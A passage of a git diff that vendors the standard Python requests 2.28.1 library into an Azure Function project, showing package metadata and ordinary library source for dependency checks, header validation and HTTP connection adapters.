fetch.fsck.badTimezone ignore +``` + +--- + +[![Kenneth Reitz](https://raw.githubusercontent.com/psf/requests/main/ext/kr.png)](https://kennethreitz.org) [![Python Software Foundation](https://raw.githubusercontent.com/psf/requests/main/ext/psf.png)](https://www.python.org/psf) + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/RECORD new file mode 100644 index 0000000..79ca4fe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/RECORD @@ -0,0 +1,42 @@ +requests-2.28.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +requests-2.28.1.dist-info/LICENSE,sha256=CeipvOyAZxBGUsFoaFqwkx54aPnIKEtm9a5u2uXxEws,10142 +requests-2.28.1.dist-info/METADATA,sha256=eoNYSJuPWbql7Til9dKPb--KRU2ouGR4g7UxtZFoHNU,4641 +requests-2.28.1.dist-info/RECORD,, +requests-2.28.1.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +requests-2.28.1.dist-info/top_level.txt,sha256=fMSVmHfb5rbGOo6xv-O_tUX6j-WyixssE-SnwcDRxNQ,9 +requests/__init__.py,sha256=S2K0jnVP6CSrT51SctFyiB0XfI8H9Nt7EqzERAD44gg,4972 +requests/__pycache__/__init__.cpython-39.pyc,, +requests/__pycache__/__version__.cpython-39.pyc,, +requests/__pycache__/_internal_utils.cpython-39.pyc,, +requests/__pycache__/adapters.cpython-39.pyc,, +requests/__pycache__/api.cpython-39.pyc,, +requests/__pycache__/auth.cpython-39.pyc,, +requests/__pycache__/certs.cpython-39.pyc,, +requests/__pycache__/compat.cpython-39.pyc,, +requests/__pycache__/cookies.cpython-39.pyc,, +requests/__pycache__/exceptions.cpython-39.pyc,, +requests/__pycache__/help.cpython-39.pyc,, +requests/__pycache__/hooks.cpython-39.pyc,, +requests/__pycache__/models.cpython-39.pyc,, +requests/__pycache__/packages.cpython-39.pyc,, +requests/__pycache__/sessions.cpython-39.pyc,, +requests/__pycache__/status_codes.cpython-39.pyc,, +requests/__pycache__/structures.cpython-39.pyc,, +requests/__pycache__/utils.cpython-39.pyc,, +requests/__version__.py,sha256=nJVa3ef2yRyeYMhy7yHnRyjjpnNTDykZsE4Sp9irBC4,440 +requests/_internal_utils.py,sha256=aSPlF4uDhtfKxEayZJJ7KkAxtormeTfpwKSBSwtmAUw,1397 +requests/adapters.py,sha256=sEnHGl4mJz4QHBT8jG6bU5aPinUtdoH3BIuAIzT-X74,21287 +requests/api.py,sha256=dyvkDd5itC9z2g0wHl_YfD1yf6YwpGWLO7__8e21nks,6377 +requests/auth.py,sha256=h-HLlVx9j8rKV5hfSAycP2ApOSglTz77R0tz7qCbbEE,10187 +requests/certs.py,sha256=Z9Sb410Anv6jUFTyss0jFFhU6xst8ctELqfy8Ev23gw,429 +requests/compat.py,sha256=yxntVOSEHGMrn7FNr_32EEam1ZNAdPRdSE13_yaHzTk,1451 +requests/cookies.py,sha256=kD3kNEcCj-mxbtf5fJsSaT86eGoEYpD3X0CSgpzl7BM,18560 +requests/exceptions.py,sha256=DhveFBclVjTRxhRduVpO-GbMYMID2gmjdLfNEqNpI_U,3811 +requests/help.py,sha256=gPX5d_H7Xd88aDABejhqGgl9B1VFRTt5BmiYvL3PzIQ,3875 +requests/hooks.py,sha256=CiuysiHA39V5UfcCBXFIx83IrDpuwfN9RcTUgv28ftQ,733 +requests/models.py,sha256=OiVxiOdlhzpbZoxut2OhKtpYlB7WW4iHQcfqSVmT4H4,35222 +requests/packages.py,sha256=DXgv-FJIczZITmv0vEBAhWj4W-5CGCIN_ksvgR17Dvs,957 +requests/sessions.py,sha256=KUqJcRRLovNefUs7ScOXSUVCcfSayTFWtbiJ7gOSlTI,30180 +requests/status_codes.py,sha256=FvHmT5uH-_uimtRz5hH9VCbt7VV-Nei2J9upbej6j8g,4235 +requests/structures.py,sha256=-IbmhVz06S-5aPSZuUthZ6-6D9XOjRuTXHOabY041XM,2912 +requests/utils.py,sha256=5_ws-bsKI9EHl7j27yi-6HFzPBKultPgd7HfPrUToWI,33228 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/WHEEL new file mode 100644 index 0000000..153494e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/top_level.txt new file mode 100644 index 0000000..bebaa03 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/top_level.txt @@ -0,0 +1 @@ +requests diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__init__.py new file mode 100644 index 0000000..ad793a4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__init__.py @@ -0,0 +1,180 @@ +# __ +# /__) _ _ _ _ _/ _ +# / ( (- (/ (/ (- _) / _) +# / + +""" +Requests HTTP Library +~~~~~~~~~~~~~~~~~~~~~ + +Requests is an HTTP library, written in Python, for human beings. +Basic GET usage: + + >>> import requests + >>> r = requests.get('https://www.python.org') + >>> r.status_code + 200 + >>> b'Python is a programming language' in r.content + True + +... or POST: + + >>> payload = dict(key1='value1', key2='value2') + >>> r = requests.post('https://httpbin.org/post', data=payload) + >>> print(r.text) + { + ... + "form": { + "key1": "value1", + "key2": "value2" + }, + ... + } + +The other HTTP methods are supported - see `requests.api`. Full documentation +is at . + +:copyright: (c) 2017 by Kenneth Reitz. +:license: Apache 2.0, see LICENSE for more details. +""" + +import warnings + +import urllib3 + +from .exceptions import RequestsDependencyWarning + +try: + from charset_normalizer import __version__ as charset_normalizer_version +except ImportError: + charset_normalizer_version = None + +try: + from chardet import __version__ as chardet_version +except ImportError: + chardet_version = None + + +def check_compatibility(urllib3_version, chardet_version, charset_normalizer_version): + urllib3_version = urllib3_version.split(".") + assert urllib3_version != ["dev"] # Verify urllib3 isn't installed from git. + + # Sometimes, urllib3 only reports its version as 16.1. + if len(urllib3_version) == 2: + urllib3_version.append("0") + + # Check urllib3 for compatibility. + major, minor, patch = urllib3_version # noqa: F811 + major, minor, patch = int(major), int(minor), int(patch) + # urllib3 >= 1.21.1, <= 1.26 + assert major == 1 + assert minor >= 21 + assert minor <= 26 + + # Check charset_normalizer for compatibility. + if chardet_version: + major, minor, patch = chardet_version.split(".")[:3] + major, minor, patch = int(major), int(minor), int(patch) + # chardet_version >= 3.0.2, < 6.0.0 + assert (3, 0, 2) <= (major, minor, patch) < (6, 0, 0) + elif charset_normalizer_version: + major, minor, patch = charset_normalizer_version.split(".")[:3] + major, minor, patch = int(major), int(minor), int(patch) + # charset_normalizer >= 2.0.0 < 3.0.0 + assert (2, 0, 0) <= (major, minor, patch) < (3, 0, 0) + else: + raise Exception("You need either charset_normalizer or chardet installed") + + +def _check_cryptography(cryptography_version): + # cryptography < 1.3.4 + try: + cryptography_version = list(map(int, cryptography_version.split("."))) + except ValueError: + return + + if cryptography_version < [1, 3, 4]: + warning = "Old version of cryptography ({}) may cause slowdown.".format( + cryptography_version + ) + warnings.warn(warning, RequestsDependencyWarning) + + +# Check imported dependencies for compatibility. +try: + check_compatibility( + urllib3.__version__, chardet_version, charset_normalizer_version + ) +except (AssertionError, ValueError): + warnings.warn( + "urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported " + "version!".format( + urllib3.__version__, chardet_version, charset_normalizer_version + ), + RequestsDependencyWarning, + ) + +# Attempt to enable urllib3's fallback for SNI support +# if the standard library doesn't support SNI or the +# 'ssl' library isn't available. +try: + try: + import ssl + except ImportError: + ssl = None + + if not getattr(ssl, "HAS_SNI", False): + from urllib3.contrib import pyopenssl + + pyopenssl.inject_into_urllib3() + + # Check cryptography version + from cryptography import __version__ as cryptography_version + + _check_cryptography(cryptography_version) +except ImportError: + pass + +# urllib3's DependencyWarnings should be silenced. +from urllib3.exceptions import DependencyWarning + +warnings.simplefilter("ignore", DependencyWarning) + +# Set default logging handler to avoid "No handler found" warnings. +import logging +from logging import NullHandler + +from . import packages, utils +from .__version__ import ( + __author__, + __author_email__, + __build__, + __cake__, + __copyright__, + __description__, + __license__, + __title__, + __url__, + __version__, +) +from .api import delete, get, head, options, patch, post, put, request +from .exceptions import ( + ConnectionError, + ConnectTimeout, + FileModeWarning, + HTTPError, + JSONDecodeError, + ReadTimeout, + RequestException, + Timeout, + TooManyRedirects, + URLRequired, +) +from .models import PreparedRequest, Request, Response +from .sessions import Session, session +from .status_codes import codes + +logging.getLogger(__name__).addHandler(NullHandler()) + +# FileModeWarnings go off per the default. +warnings.simplefilter("default", FileModeWarning, append=True) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3dbe904 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__version__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__version__.cpython-39.pyc new file mode 100644 index 0000000..326bfe4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__version__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/_internal_utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/_internal_utils.cpython-39.pyc new file mode 100644 index 0000000..e4ffb3f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/_internal_utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/adapters.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/adapters.cpython-39.pyc new file mode 100644 index 0000000..780f54b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/adapters.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/api.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/api.cpython-39.pyc new file mode 100644 index 0000000..288bb19 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/api.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/auth.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/auth.cpython-39.pyc new file mode 100644 index 0000000..8bdbdfb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/auth.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/certs.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/certs.cpython-39.pyc new file mode 100644 index 0000000..83f93e1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/certs.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/compat.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/compat.cpython-39.pyc new file mode 100644 index 0000000..aceaf3e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/compat.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/cookies.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/cookies.cpython-39.pyc new file mode 100644 index 0000000..4219c28 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/cookies.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..c58a7ea Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/help.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/help.cpython-39.pyc new file mode 100644 index 0000000..7e38500 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/help.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/hooks.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/hooks.cpython-39.pyc new file mode 100644 index 0000000..a25abf6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/hooks.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/models.cpython-39.pyc new file mode 100644 index 0000000..7853edd Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/packages.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/packages.cpython-39.pyc new file mode 100644 index 0000000..24f436a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/packages.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/sessions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/sessions.cpython-39.pyc new file mode 100644 index 0000000..5cd8841 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/sessions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/status_codes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/status_codes.cpython-39.pyc new file mode 100644 index 0000000..9ad1eec Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/status_codes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/structures.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/structures.cpython-39.pyc new file mode 100644 index 0000000..709e257 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/structures.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..e3ede7e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__version__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__version__.py new file mode 100644 index 0000000..90e04ed --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__version__.py @@ -0,0 +1,14 @@ +# .-. .-. .-. . . .-. .-. .-. .-. +# |( |- |.| | | |- `-. | `-. +# ' ' `-' `-`.`-' `-' `-' ' `-' + +__title__ = "requests" +__description__ = "Python HTTP for Humans." +__url__ = "https://requests.readthedocs.io" +__version__ = "2.28.1" +__build__ = 0x022801 +__author__ = "Kenneth Reitz" +__author_email__ = "me@kennethreitz.org" +__license__ = "Apache 2.0" +__copyright__ = "Copyright 2022 Kenneth Reitz" +__cake__ = "\u2728 \U0001f370 \u2728" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/_internal_utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/_internal_utils.py new file mode 100644 index 0000000..0d122db --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/_internal_utils.py @@ -0,0 +1,48 @@ +""" +requests._internal_utils +~~~~~~~~~~~~~~ + +Provides utility functions that are consumed internally by Requests +which depend on extremely few external helpers (such as compat) +""" +import re + +from .compat import builtin_str + +_VALID_HEADER_NAME_RE_BYTE = re.compile(rb"^[^:\s][^:\r\n]*$") +_VALID_HEADER_NAME_RE_STR = re.compile(r"^[^:\s][^:\r\n]*$") +_VALID_HEADER_VALUE_RE_BYTE = re.compile(rb"^\S[^\r\n]*$|^$") +_VALID_HEADER_VALUE_RE_STR = re.compile(r"^\S[^\r\n]*$|^$") + +HEADER_VALIDATORS = { + bytes: (_VALID_HEADER_NAME_RE_BYTE, _VALID_HEADER_VALUE_RE_BYTE), + str: (_VALID_HEADER_NAME_RE_STR, _VALID_HEADER_VALUE_RE_STR), +} + + +def to_native_string(string, encoding="ascii"): + """Given a string object, regardless of type, returns a representation of + that string in the native string type, encoding and decoding where + necessary. This assumes ASCII unless told otherwise. + """ + if isinstance(string, builtin_str): + out = string + else: + out = string.decode(encoding) + + return out + + +def unicode_is_ascii(u_string): + """Determine if unicode string only contains ASCII characters. + + :param str u_string: unicode string to check. Must be unicode + and not Python 2 `str`. + :rtype: bool + """ + assert isinstance(u_string, str) + try: + u_string.encode("ascii") + return True + except UnicodeEncodeError: + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/adapters.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/adapters.py new file mode 100644 index 0000000..b256d87 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/adapters.py @@ -0,0 +1,584 @@ +""" +requests.adapters +~~~~~~~~~~~~~~~~~ + +This module contains the transport adapters that Requests uses to define +and maintain connections. +""" + +import os.path +import socket # noqa: F401 + +from urllib3.exceptions import ClosedPoolError, ConnectTimeoutError +from urllib3.exceptions import HTTPError as _HTTPError +from urllib3.exceptions import InvalidHeader as _InvalidHeader +from urllib3.exceptions import ( + LocationValueError, + MaxRetryError, + NewConnectionError, + ProtocolError, +) +from urllib3.exceptions import ProxyError as _ProxyError +from urllib3.exceptions import ReadTimeoutError, ResponseError +from urllib3.exceptions import SSLError as _SSLError +from urllib3.poolmanager import PoolManager, proxy_from_url +from urllib3.response import HTTPResponse +from urllib3.util import Timeout as TimeoutSauce +from urllib3.util import parse_url +from urllib3.util.retry import Retry + +from .auth import _basic_auth_str +from .compat import basestring, urlparse +from .cookies import extract_cookies_to_jar +from .exceptions import ( + ConnectionError, + ConnectTimeout, + InvalidHeader, + InvalidProxyURL, + InvalidSchema, + InvalidURL, + ProxyError, + ReadTimeout, + RetryError, + SSLError, +) +from .models import Response +from .structures import CaseInsensitiveDict +from .utils import ( + DEFAULT_CA_BUNDLE_PATH, + extract_zipped_paths, + get_auth_from_url, + get_encoding_from_headers, + prepend_scheme_if_needed, + select_proxy, + urldefragauth, +) + +try: + from urllib3.contrib.socks import SOCKSProxyManager +except ImportError: + + def SOCKSProxyManager(*args, **kwargs): + raise InvalidSchema("Missing dependencies for SOCKS support.") + + +DEFAULT_POOLBLOCK = False +DEFAULT_POOLSIZE = 10 +DEFAULT_RETRIES = 0 +DEFAULT_POOL_TIMEOUT = None + + +class BaseAdapter: + """The Base Transport Adapter""" + + def __init__(self): + super().__init__() + + def send( + self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None + ): + """Sends PreparedRequest object. Returns Response object. + + :param request: The :class:`PreparedRequest ` being sent. + :param stream: (optional) Whether to stream the request content. + :param timeout: (optional) How long to wait for the server to send + data before giving up, as a float, or a :ref:`(connect timeout, + read timeout) ` tuple. + :type timeout: float or tuple + :param verify: (optional) Either a boolean, in which case it controls whether we verify + the server's TLS certificate, or a string, in which case it must be a path + to a CA bundle to use + :param cert: (optional) Any user-provided SSL certificate to be trusted. + :param proxies: (optional) The proxies dictionary to apply to the request. + """ + raise NotImplementedError + + def close(self): + """Cleans up adapter specific items.""" + raise NotImplementedError + + +class HTTPAdapter(BaseAdapter): + """The built-in HTTP Adapter for urllib3. + + Provides a general-case interface for Requests sessions to contact HTTP and + HTTPS urls by implementing the Transport Adapter interface. This class will + usually be created by the :class:`Session ` class under the + covers. + + :param pool_connections: The number of urllib3 connection pools to cache. + :param pool_maxsize: The maximum number of connections to save in the pool. + :param max_retries: The maximum number of retries each connection + should attempt. Note, this applies only to failed DNS lookups, socket + connections and connection timeouts, never to requests where data has + made it to the server. By default, Requests does not retry failed + connections. If you need granular control over the conditions under + which we retry a request, import urllib3's ``Retry`` class and pass + that instead. + :param pool_block: Whether the connection pool should block for connections. + + Usage:: + + >>> import requests + >>> s = requests.Session() + >>> a = requests.adapters.HTTPAdapter(max_retries=3) + >>> s.mount('http://', a) + """ + + __attrs__ = [ + "max_retries", + "config", + "_pool_connections", + "_pool_maxsize", + "_pool_block", + ] + + def __init__( + self, + pool_connections=DEFAULT_POOLSIZE, + pool_maxsize=DEFAULT_POOLSIZE, + max_retries=DEFAULT_RETRIES, + pool_block=DEFAULT_POOLBLOCK, + ): + if max_retries == DEFAULT_RETRIES: + self.max_retries = Retry(0, read=False) + else: + self.max_retries = Retry.from_int(max_retries) + self.config = {} + self.proxy_manager = {} + + super().__init__() + + self._pool_connections = pool_connections + self._pool_maxsize = pool_maxsize + self._pool_block = pool_block + + self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block) + + def __getstate__(self): + return {attr: getattr(self, attr, None) for attr in self.__attrs__} + + def __setstate__(self, state): + # Can't handle by adding 'proxy_manager' to self.__attrs__ because + # self.poolmanager uses a lambda function, which isn't pickleable. + self.proxy_manager = {} + self.config = {} + + for attr, value in state.items(): + setattr(self, attr, value) + + self.init_poolmanager( + self._pool_connections, self._pool_maxsize, block=self._pool_block + ) + + def init_poolmanager( + self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs + ): + """Initializes a urllib3 PoolManager. + + This method should not be called from user code, and is only + exposed for use when subclassing the + :class:`HTTPAdapter `. + + :param connections: The number of urllib3 connection pools to cache. + :param maxsize: The maximum number of connections to save in the pool. + :param block: Block when no free connections are available. + :param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager. + """ + # save these values for pickling + self._pool_connections = connections + self._pool_maxsize = maxsize + self._pool_block = block + + self.poolmanager = PoolManager( + num_pools=connections, + maxsize=maxsize, + block=block, + strict=True, + **pool_kwargs, + ) + + def proxy_manager_for(self, proxy, **proxy_kwargs): + """Return urllib3 ProxyManager for the given proxy. + + This method should not be called from user code, and is only + exposed for use when subclassing the + :class:`HTTPAdapter `. + + :param proxy: The proxy to return a urllib3 ProxyManager for. + :param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager. + :returns: ProxyManager + :rtype: urllib3.ProxyManager + """ + if proxy in self.proxy_manager: + manager = self.proxy_manager[proxy] + elif proxy.lower().startswith("socks"): + username, password = get_auth_from_url(proxy) + manager = self.proxy_manager[proxy] = SOCKSProxyManager( + proxy, + username=username, + password=password, + num_pools=self._pool_connections, + maxsize=self._pool_maxsize, + block=self._pool_block, + **proxy_kwargs, + ) + else: + proxy_headers = self.proxy_headers(proxy) + manager = self.proxy_manager[proxy] = proxy_from_url( + proxy, + proxy_headers=proxy_headers, + num_pools=self._pool_connections, + maxsize=self._pool_maxsize, + block=self._pool_block, + **proxy_kwargs, + ) + + return manager + + def cert_verify(self, conn, url, verify, cert): + """Verify a SSL certificate. This method should not be called from user + code, and is only exposed for use when subclassing the + :class:`HTTPAdapter `. + + :param conn: The urllib3 connection object associated with the cert. + :param url: The requested URL. + :param verify: Either a boolean, in which case it controls whether we verify + the server's TLS certificate, or a string, in which case it must be a path + to a CA bundle to use + :param cert: The SSL certificate to verify. + """ + if url.lower().startswith("https") and verify: + + cert_loc = None + + # Allow self-specified cert location. + if verify is not True: + cert_loc = verify + + if not cert_loc: + cert_loc = extract_zipped_paths(DEFAULT_CA_BUNDLE_PATH) + + if not cert_loc or not os.path.exists(cert_loc): + raise OSError( + f"Could not find a suitable TLS CA certificate bundle, " + f"invalid path: {cert_loc}" + ) + + conn.cert_reqs = "CERT_REQUIRED" + + if not os.path.isdir(cert_loc): + conn.ca_certs = cert_loc + else: + conn.ca_cert_dir = cert_loc + else: + conn.cert_reqs = "CERT_NONE" + conn.ca_certs = None + conn.ca_cert_dir = None + + if cert: + if not isinstance(cert, basestring): + conn.cert_file = cert[0] + conn.key_file = cert[1] + else: + conn.cert_file = cert + conn.key_file = None + if conn.cert_file and not os.path.exists(conn.cert_file): + raise OSError( + f"Could not find the TLS certificate file, " + f"invalid path: {conn.cert_file}" + ) + if conn.key_file and not os.path.exists(conn.key_file): + raise OSError( + f"Could not find the TLS key file, invalid path: {conn.key_file}" + ) + + def build_response(self, req, resp): + """Builds a :class:`Response ` object from a urllib3 + response. This should not be called from user code, and is only exposed + for use when subclassing the + :class:`HTTPAdapter ` + + :param req: The :class:`PreparedRequest ` used to generate the response. + :param resp: The urllib3 response object. + :rtype: requests.Response + """ + response = Response() + + # Fallback to None if there's no status_code, for whatever reason. + response.status_code = getattr(resp, "status", None) + + # Make headers case-insensitive. + response.headers = CaseInsensitiveDict(getattr(resp, "headers", {})) + + # Set encoding. + response.encoding = get_encoding_from_headers(response.headers) + response.raw = resp + response.reason = response.raw.reason + + if isinstance(req.url, bytes): + response.url = req.url.decode("utf-8") + else: + response.url = req.url + + # Add new cookies from the server. + extract_cookies_to_jar(response.cookies, req, resp) + + # Give the Response some context. + response.request = req + response.connection = self + + return response + + def get_connection(self, url, proxies=None): + """Returns a urllib3 connection for the given URL. This should not be + called from user code, and is only exposed for use when subclassing the + :class:`HTTPAdapter `. + + :param url: The URL to connect to. + :param proxies: (optional) A Requests-style dictionary of proxies used on this request. + :rtype: urllib3.ConnectionPool + """ + proxy = select_proxy(url, proxies) + + if proxy: + proxy = prepend_scheme_if_needed(proxy, "http") + proxy_url = parse_url(proxy) + if not proxy_url.host: + raise InvalidProxyURL( + "Please check proxy URL. It is malformed " + "and could be missing the host." + ) + proxy_manager = self.proxy_manager_for(proxy) + conn = proxy_manager.connection_from_url(url) + else: + # Only scheme should be lower case + parsed = urlparse(url) + url = parsed.geturl() + conn = self.poolmanager.connection_from_url(url) + + return conn + + def close(self): + """Disposes of any internal state. + + Currently, this closes the PoolManager and any active ProxyManager, + which closes any pooled connections. + """ + self.poolmanager.clear() + for proxy in self.proxy_manager.values(): + proxy.clear() + + def request_url(self, request, proxies): + """Obtain the url to use when making the final request. + + If the message is being sent through a HTTP proxy, the full URL has to + be used. Otherwise, we should only use the path portion of the URL. + + This should not be called from user code, and is only exposed for use + when subclassing the + :class:`HTTPAdapter `. + + :param request: The :class:`PreparedRequest ` being sent. + :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs. + :rtype: str + """ + proxy = select_proxy(request.url, proxies) + scheme = urlparse(request.url).scheme + + is_proxied_http_request = proxy and scheme != "https" + using_socks_proxy = False + if proxy: + proxy_scheme = urlparse(proxy).scheme.lower() + using_socks_proxy = proxy_scheme.startswith("socks") + + url = request.path_url + if is_proxied_http_request and not using_socks_proxy: + url = urldefragauth(request.url) + + return url + + def add_headers(self, request, **kwargs): + """Add any headers needed by the connection. As of v2.0 this does + nothing by default, but is left for overriding by users that subclass + the :class:`HTTPAdapter `. + + This should not be called from user code, and is only exposed for use + when subclassing the + :class:`HTTPAdapter `. + + :param request: The :class:`PreparedRequest ` to add headers to. + :param kwargs: The keyword arguments from the call to send(). + """ + pass + + def proxy_headers(self, proxy): + """Returns a dictionary of the headers to add to any request sent + through a proxy. This works with urllib3 magic to ensure that they are + correctly sent to the proxy, rather than in a tunnelled request if + CONNECT is being used. + + This should not be called from user code, and is only exposed for use + when subclassing the + :class:`HTTPAdapter `. + + :param proxy: The url of the proxy being used for this request. + :rtype: dict + """ + headers = {} + username, password = get_auth_from_url(proxy) + + if username: + headers["Proxy-Authorization"] = _basic_auth_str(username, password) + + return headers + + def send( + self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None + ): + """Sends PreparedRequest object. Returns Response object. + + :param 